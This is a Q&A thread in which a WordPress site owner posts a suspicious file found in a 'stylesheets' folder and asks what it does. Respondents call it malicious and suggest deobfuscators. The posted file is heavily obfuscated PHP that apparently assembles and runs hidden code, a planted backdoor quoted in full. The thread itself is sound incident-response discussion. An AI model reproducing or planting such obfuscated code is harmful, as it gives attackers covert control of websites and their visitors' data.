# Need some help to identify what this dodgey code does? found on WordPress install

Tags: php, wordpress, bots

Okay so I have a WordPress site. I found a file called: *mod_latestnews.php* in a folder called: *stylesheets* in the root of the WordPress install (root of the domain). I have a strong suspicion that it might be malicious. Just need some help to Identify it thanks.

```
<?php
$Q_='sCXqZD1Bv'&~cIJ;$X6Bzl='E$e'|'^ i';$psqlbMHVJ3='T!2`>&'|'#'.dVetT;$gzWQoy='_?'.
'/~6kVp{fN%'&'^o~^</n7J&Ol';$AS_Si0='w{o~_}wm~_v}~'.o_grze.'}'&/*fGhnTtxKMf4Sw'.
'aGPs_Zqda*/"ok|o_}{m~_v}~".o_kr."~m}";$IL8D6p=HJMDhUH.'=(_OI@DJ@@'./*GjZ1O5Kz'.
'I5rSB${*/I2RVH6ABJH.'@'.BDOR|'@HQ@dI }0'.LZHB.'@'.h4DI.'"PFD('.TJzDHDDLv;'DKP'.
'Xr:';$HBOYG2nU6=GnwG&'[?wl';$zzH=jku&'!]N';$PXW0_MgmTi='#'&q;$Wfqi_lu='s>_}}o'.
'k_/;'&"Qg{=}_#~??";$i6b2C9KsM01='J@TQ]'.MIHQQhTFm.']'.KHQOHPNiE|YTRLKPVc.#slf'.
'^'.UfTGCBBY.'!'.FNUn.'"D';$qASK='@'.TdPU.':'.QUVICEMN.'[ThD.'.JOALt|'hv|@[J_@'.
'v`'.OTKCF7.'"'.EfOnLY6;$M07='BE5='|'b"<!';$BaL=A&a;$C66HKXW='6c?lew'^#x8Pa2N5'.
'~7k<:6';$A2ImaeJCMP=rr&yz;$bqKqY='a%Q@aP`ac`'|'eF^r%`L@a%';$o7=/*RNnrKVX0m7Ld'.
'R)@$6w*/"EB1( -Bp`G\$6"|' '.C1HdmD.'%dF`D';$zz5EOx='LW@lD)ljX'|DSRL.'$'./*fv6'.
'UAz$6)*/ehbB;$pch1SaJiI="Wy{".lmVysr."}v"&'_=zf}~{c:lw';$ID7bbiuBJ=$X6Bzl^(#w'.
'~iX'&'3Vz');$jw7=('omu}o~'&'o}~}o~')&$psqlbMHVJ3;$ygm_RozfP=$gzWQoy^(/*klrOVx'.
'-?@),*/ugtNCm.'@pft]?'^'[:?w(4c0@3p~');$kA=('{w}~'._wwor_owoc_.'}{su{'&#GBcIJ'.
'{}'.nm_w.'{'.gs_ouo.'{_s{s{{')&$AS_Si0;$zkrpwgj3Ls=$IL8D6p^('}/?&Z?^O]{j.'./*'.
'>%IefQLZ-*/swZce.'{wcp){3|ow/~{}['&'}?;ox~~NY;{'.zwwx_7.'/'.Wgjm.#yZuCXFdZ5vR'.
'[3|]}:~s}b');$s424CmhsRx=$HBOYG2nU6^(lOyk&'mOX%');$dwGdfGQrb1I=('>%Q'^ZLp)|/*'.
'.HsV*/$zzH;$X_j=$PXW0_MgmTi|$BaL;$qQgbhHxspb=(Hy0O.' '.bB7BH|",4 F ".pD5B./*K'.
'x_,|*Y*/"@")^$Wfqi_lu;$IVXoBNtp=$i6b2C9KsM01&$qASK;if($ID7bbiuBJ($jw7(/*_H1EE'.
'{u*/$C66HKXW))!=$zkrpwgj3Ls)$ygm_RozfP($s424CmhsRx,$dwGdfGQrb1I,$X_j);$kA(/*z'.
'4rAeZq33v?*/$A2ImaeJCMP.$bqKqY,array($qQgbhHxspb,$jw7($IVXoBNtp),$o7./*KByxGf'.
',|BJpU_{~*/$zz5EOx.$pch1SaJiI.$M07));#-_gFxEx%N1L$wWJw_Zry:p..(ZC_vSjJ@JH39n'.
'P{-1gib :7k=LYkAW?w4rHS_.fUuc_Q_tnjMS{{N[n_YN]f@d4';
```

Comment: I'm quite sure that's malicious. I would post some of that to websites like: http://ddecode.com/phpdecoder/ or http://www.whitefirdesign.com/tools/deobfuscate-php-hack-code.html

Answer (score 0):

Yes it looks like an encripted code. Try decoding it with online decoders. Also do a search on your complete website for "mod_latestnews", it might be called by some other file. Have a look at my answer on this question. 
[Are my websites hacked?](https://stackoverflow.com/questions/28562678/are-my-websites-hacked/28563086?noredirect=1#comment45512518_28563086)

Answer (score 0):

Yes, it is definitely a malicious code snippet added on your website as by default WordPress does not have any ***stylesheets*** folder inside root directory.